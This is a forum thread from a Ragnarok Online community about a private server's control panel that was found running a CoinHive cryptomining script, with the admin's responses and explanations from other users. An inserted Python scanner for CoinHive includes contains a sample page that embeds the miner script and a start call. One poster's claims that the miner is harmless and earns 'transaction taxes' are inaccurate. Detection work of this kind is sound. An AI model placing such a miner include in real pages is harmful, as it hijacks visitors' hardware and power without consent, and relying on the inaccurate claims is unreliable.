RateMyServer Ragnarok Community

RateMyServer.Net => Server Discussion => Rant and Rave => Topic started by: Fluorite~ on Dec 30, 2017, 09:53 PM

Title: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Fluorite~ on Dec 30, 2017, 09:53 PM
Upon accessing CapeRO's website, I was alerted by my antivirus that it had stopped a CoinHive script from running.  After checking the page source, there is definitely a CoinHive script integrated on its Main Page/Patcher.
https://i.imgur.com/U4Jad9W.png

For those of you who are unaware, CoinHive is a Javascript that activates when a user accesses a webpage.  When it runs, it does so without the user's permission and consumes their processor's resources in a cryptocurrency mining operation.
https://blog.malwarebytes.com/security-world/2017/10/why-is-malwarebytes-blocking-coinhive/
https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/

When the admin was asked about it, CapeRO said it was "a common problem with Ragnarok Thor Patchers + Windows Update" (it isn't) and seemed to suggest it was the fault of viruses present in a player, closing the topic shortly afterwards.
https://cape-ro.com/forum/index.php?/topic/283-troyan-inside-cape-ro-patcher/?p=1561
Image copies of the discussion:
https://i.imgur.com/dALXcpo.png
https://i.imgur.com/mPbnojY.png

I can understand the need for income when running an RO server, but unauthorized usage of your unsuspecting userbase's computers is not a path to walk down.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 10:17 PM
We checked the patcher files and couldn't even find this. Based on the domain on your screenshot, it's not even the patcher's domain. That's the Control Panel's domain. Maybe you should link us to the actual findings rather than accusing us of doing these purposely. We have bought an SSL Certificate to give an extra assurance to our players. We have no idea where this is coming from. If you have a good source of accurate information then let us know, because we didn't build this website ourselves; it's a made website bought from s1Lykos.

However, we will keep investigating the issue and if we do find something we'll definitely fix it right away.

PS: If you're a legit forum member, you'll know that every time I answer reports / suggestions I would close the topic right away to keep the forum clean at all times.

Update#1 The report was about the Patcher which we found nothing wrong with.
Update#2 This issue might be something to do with the Control Panel. We will investigate further.
Update#3 Website has been put under maintenance for re-construction and fixing of whatever error there is.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 30, 2017, 10:22 PM
I don't know about the patcher, but it's definitely on the main control panel, starting at line 63 in the page source. view-source:https://cape-ro.com/cp/ I was keeping an eye on this server, sad to see.
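Added example, not part of any post in this thread: one way a site owner could locate this kind of script include by line number in a page's source, as described above. It matches only the CoinHive script hosts and `CoinHive.*` constructor calls; the sample page and its site key are constructed, and the names `MinerScan` and `scan_page` are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CoinHive loader indicators: its script hosts and its JavaScript constructors.
MINER_HOSTS = ("coinhive.com", "coin-hive.com")
MINER_CALL = re.compile(r"\bCoinHive\.\w+\s*\(")


class MinerScan(HTMLParser):
    """Collects (line, kind, evidence) for miner references in <script> tags."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self.in_script = True
        src = dict(attrs).get("src") or ""
        host = urlparse(src).hostname or ""  # hostname is None for relative paths
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            self.findings.append((self.getpos()[0], "external-miner-script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if not self.in_script:
            return
        start_line = self.getpos()[0]  # line where this chunk of script text begins
        for m in MINER_CALL.finditer(data):
            line = start_line + data.count("\n", 0, m.start())
            self.findings.append((line, "inline-miner-call", m.group(0)))


def scan_page(html):
    """Return miner findings for one page of HTML source, in document order."""
    scanner = MinerScan()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page source (not the real control panel markup).
SAMPLE_PAGE = """<!DOCTYPE html>
<html>
<head>
<title>Control Panel</title>
<script src="/js/jquery.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('CONSTRUCTED-SITE-KEY');
  miner.start();
</script>
</head>
<body><p>Server news</p></body>
</html>
"""

if __name__ == "__main__":
    for line, kind, evidence in scan_page(SAMPLE_PAGE):
        print(f"line {line}: {kind}: {evidence}")
```

A renamed, self-hosted or obfuscated copy of the script would not match these name-based indicators, so a clean result from this scan is not proof that a page is clean.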
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 10:32 PM
We checked the patcher files and couldn't even find this. Based on the domain on your screenshot, it's not even the patcher's domain. That's the Control Panel's domain. Maybe you should link us to the actual findings rather than accusing us of doing these purposely. We have bought an SSL Certificate to give an extra assurance to our players. We have no idea where this is coming from. If you have a good source of accurate information then let us know, because we didn't build this website ourselves; it's a made website bought from s1Lykos.

However, we will keep investigating the issue and if we do find something we'll definitely fix it right away.

PS: If you're a legit forum member, you'll know that every time I answer reports / suggestions I would close the topic right away to keep the forum clean at all times.

Update#1 The report was about the Patcher which we found nothing wrong with.
Update#2 This issue might be something to do with the Control Panel. We will investigate further.
Update#3 Website has been put under maintenance for re-construction and fixing of whatever error there is.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Fluorite~ on Dec 30, 2017, 10:53 PM
Wouldn't know too much about the Patcher's files itself (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits anytime someone executes it.  The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.

Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 11:06 PM
Quote from: Fluorite~ on Dec 30, 2017, 10:53 PM
Wouldn't know too much about the Patcher's files itself (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits anytime someone executes it.  The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.

I see, so you basically just randomly figured out that there is a problem with the patcher without even trying it. Is it really strange to tell them that if I found nothing wrong with the Server's Patcher? Thor patchers do have problems with anti-viruses because it's detecting it as a false alarm.  If the report was on-point and see the bug then we would have fixed it right away. The problem wasn't coming from the Thor Patcher but the website coding itself. It did not affect anybody and no harm was done. We're just putting the site / cp on maintenance to make sure everything will be alright and safe.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 30, 2017, 11:24 PM
Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their pc for mining without permission, same as if it was opened in a browser. How can you say no harm was done, it's still on the cp regardless of if it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Fluorite~ on Dec 30, 2017, 11:27 PM
Why would anyone even attempt to download a Patcher that is suspected to be infected...?

As for it being an issue with Windows Defender + Thor Patchers, that is horribly misinformed.  When there are issues with Thor Patchers being detected as trojans, it's a detected issue with the Patcher's files itself, not a BitCoin miner like CoinHive as stated in the forum report.  Elvarion and Puddles in that forum report even gave huge leads as to what the real problem was in that report before it was closed.  It was negligent to throw that under the umbrella statement of being a false positive detection and moving on.

Regardless, the website has/had an active CoinHive Javascript for any visitors.  Whether it's yours or not is not something I can confirm, but it was positively running on your website and tapping into their computer's resources as a result.  It's good of you to respond to the problem immediately.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 11:32 PM
Quote from: Kurisuga on Dec 30, 2017, 11:24 PM
Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their pc for mining without permission, same as if it was opened in a browser. How can you say no harm was done, it's still on the cp regardless of if it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?

Oh, Did someone already tell you they lost anything? Far as I'm concerned there's not a single report given to me that they have lost anything.  If someone did, I would take full responsibility and like I mentioned in the previous comment " We have bought SSL Certificate " which RO Private sites rarely bother buying.

We are doing our job right now. Website will be back LIVE tonight fixed and cleaner.  Not sure if you guys will continue the issue but it's being taken care of carefully.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 30, 2017, 11:38 PM
Quote from: CapeRO on Dec 30, 2017, 11:32 PM
Oh, Did someone already tell you they lost anything? Far as I'm concerned there's not a single report given to me that they have lost anything.  If someone did, I would take full responsibility and like I mentioned in the previous comment " We have bought SSL Certificate " which RO Private sites rarely bother buying.

We are doing our job right now. Website will be back LIVE tonight fixed and cleaner.  Not sure if you guys will continue the issue but it's being taken care of carefully.

I'm not sure if you're being willfully ignorant or not of the extra strain it puts on people's PCs to mine bitcoin, along with power consumption. A lot of RO players run on old clunky PCs or toasters. That extra strain could easily mess up their PC's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself, most people are unaware of these risks and that's why they are targets of things like coin.hive
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 11:57 PM
Quote from: Kurisuga on Dec 30, 2017, 11:38 PM
I'm not sure if you're being willfully ignorant or not of the extra strain it puts on people's PCs to mine bitcoin, along with power consumption. A lot of RO players run on old clunky PCs or toasters. That extra strain could easily mess up their PC's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself, most people are unaware of these risks and that's why they are targets of things like coin.hive

I also run on an old chunky PC myself, or "toasters". I have no idea what this coin-hive is but it sounds like some online currency, so if people lose whatever currency that is then that's how we basically find out. We're not even sure if this is functioning or what, so we can't judge if anybody is infected or not by just brainstorming it.

But we are doing what we need to do, We're fixing whatever issue there is.

PS: I don't get the accusations really. Why would we Install SSL Certificates if this was intentional.
"SSL Certificates are small data files that digitally bind a cryptographic key to an organization's details. When installed on a web server, it activates the padlock and the https protocol (over port 443) and allows secure connections from a web server to a browser."

Update 1: I just read the info about it so it's not about losing people's currency. Still not sure how it functions but it's being dealt with.
Update 2: I run on Chunky PC and never experience slowing down. ( I visit this site like 1,000 a day )

Thanks for reporting this and actions are being worked on.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 31, 2017, 12:09 AM
The script makes the PC "create" the online currency by solving very long and taxing algorithms at the expense of their GPU/CPU use. The currency created goes into the pockets of whoever infected the control panel at the expense of the website visitors' power bill and PC processing power, which could overtax the parts over time. Sorry about the accusations, but it just really is damaging, especially because the majority of people won't ever know they were being taken advantage of in the first place.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 12:13 AM
Yeah I just read the information about it.

Thank you everybody for your concern. Website has been put under maintenance for a full check & fixing. I'll give an update when it's back.
If anybody has further issues please contact me at [email protected] . Regards.

PS: WEBSITE IS SAFE to browse as we have taken down the CP. ( check all you want )
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Parachute on Dec 31, 2017, 02:32 AM
I have not downloaded the server's patcher nor visited your site. Not to mention, I don't know where you installed your thor patcher, but in my case, I got this report accessing your site just now:

https://forumcgamershub-com-s3.s3.amazonaws.com/original/2X/6/6dd744dd6d53b4197d731a801786773ee45a0d68.png

Meaning regardless if you put your website under maintenance, the damage has already been done. Your domain name had been listed as infected site.

I'm not here to put more drama on this thread, but to give some advice as a Cybersecurity student. Please contact (uhm a lot of) Anti-malware protection/sites as they considered and listed your site as a dangerous webpage. If your users could not see this notice, then they probably don't have decent protection in their devices/browsers. If they do, they may not access your site without warning and you might lose some interested players. So 2 probable solutions:

1. contact A LOT of anti-malware companies
2. change your domain name

Having HTTPS (SSL) does not protect your website from these attacks. SSL establishes an encrypted link between your user's browser and your website to make sure all data passed down remains private. Main reason why it's generally installed in Shop's checkout and cart webpages. But in no way does SSL protect your site from these types of attacks (if you had been the victim of such). You can even pay for a much more expensive certificate and still be vulnerable to these kinds of threats. In this case, there's a totally different protection for that.

Due to the recent growth of Cryptocurrency, here comes the new trend for the past 3 months called "Cryptojacking." And yes, one of its pioneers is a company called CoinHive. What it does is self-explanatory - it secretly uses the user's laptop, PC or even mobile devices to mine cryptocurrency whenever you visit an infected site. But ofc, Anti-Malware companies are not slow on their side, they instantly detected this. But the only thing I do not understand: usually hackers tend to attack and infect big websites with a bunch of daily user visitors, not an RO website. So I just hope you did not add this JavaScript - which as it seems you have no idea how it got there. Either way, there has to be a culprit.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 02:43 AM
Thanks for the advice, I will make contacts with anti-malware companies. I have deleted all other files except Forums and cleaned it up. Only issue would be the one you posted above about the warning. I'm not sure also why would they have an interest with an RO website but hopefully our fix will solve all the issues. Regards.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Parachute on Dec 31, 2017, 02:45 AM
Quote from: CapeRO on Dec 31, 2017, 02:43 AM
Thanks for the advice, I will make contacts with anti-malware companies. I have deleted all other files except Forums and cleaned it up. Only issue would be the one you posted above about the warning. I'm not sure also why would they have an interest with an RO website but hopefully our fix will solve all the issues. Regards.

Glad to hear, hope you make the best out of it. Good luck!
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: NoiI on Dec 31, 2017, 07:47 AM
Hello everyone

I am Puddles of the aforementioned posts.
This topic is exaggerating much; CoinHive can't damage your PC or harm it in any way. Your browser is executing JavaScript in its own sandboxed environment, which it does constantly while browsing, so the browser vendors are concerned you are safe while doing it. Cryptocurrencies ensure their safety by solving large puzzles where many PCs have to take part to even make a legit transaction - lending them your computing power will give you a super small fraction of the outcome of the transaction, kinda like taxes. So it is not even the intention to harm your PC; the guy, whoever that is, who put the CoinHive there was just after the money of those transaction taxes.

The guy I mentioned could even be the provider of your webhosting inserting javascript on the end of your pages to make up for his super low prices or something.

Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 08:22 AM
Update from Forum News @ www.cape-ro.com/forum (http://www.cape-ro.com/forum) :

Greetings!

After almost half a day, our website is finally back & fixed with a New Design ( well not so new because this is a quick pre-made bought today )

Short explanation:
The previous website design had a little problem that's why we rushed to buy a new pre-made one that is more secured. This pre-made website is functioning well but we may not keep this design because it's too basic.

If anyone encounters any trouble, please let me know.

Regards.

Update Here on RMS:

Any possible errors have been removed and we're keeping our eyes on it. We may change domain name for the false warning caused by it, but for now the Website is Cleaned, Freshed and well functioning!

Feel free to test our and tell me if you find anymore problems :) Thanks RMS Community!

www.cape-ro.com (http://www.cape-ro.com)
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: ggwp on Dec 31, 2017, 09:19 PM
If you bought the previous control panel, you should ask the one that made it. Then look at who has access to the server to edit the control panel. This is a serious problem and the culprit needs to be found to prevent the same thing happening.

The one that added that CoinHive script to your control panel is profiting money from the user. The script runs a cryptomining task using the user's computing power. For a toaster rig this is dangerous because most of the time it will run their rig at 100% and will shorten your users' hardware life. Players with better rigs "only" waste more $$ on electricity because their rig runs more than usual. For every $1 your user wastes on electricity cost when running the script, that culprit gets around $0,1.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 09:52 PM
It's all sorted and we're monitoring it every moment closely to prevent any errors from happening.

Happy New Year!

CapeRO
www.cape-ro.com (http://www.cape-ro.com)